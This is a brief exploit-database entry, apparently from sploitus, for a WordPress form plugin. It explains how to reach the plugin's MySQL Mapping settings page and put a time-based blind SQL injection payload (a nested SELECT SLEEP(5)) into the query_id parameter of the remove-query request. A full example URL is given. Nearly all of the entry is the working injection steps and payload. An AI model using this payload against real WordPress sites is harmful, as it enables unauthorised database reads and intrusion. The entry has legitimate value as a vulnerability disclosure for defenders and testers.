Share 
## https://sploitus.com/exploit?id=WPEX-ID:DDC9ED69-D942-4FAD-BBF4-1BE3B86460D9
Create/edit a form, go to the Settings > MySQL Mapping (i.e /admin.php?page=manage_fm&task=edit&current_id=1&tab=4&fieldset_id=mapping). Copy the link to delete a query (create a query if there is none) and add the following payload in the query_id parameter: 1%20AND%20(SELECT%209312%20FROM%20(SELECT(SLEEP(5)))hYkP)

e.g: https://example.com/wp-admin/admin.php?page=manage_fm&nonce_fm=27d813d111&task=remove_query&current_id=1&query_id=1%20AND%20(SELECT%209312%20FROM%20(SELECT(SLEEP(5)))hYkP)&fieldset_id=mapping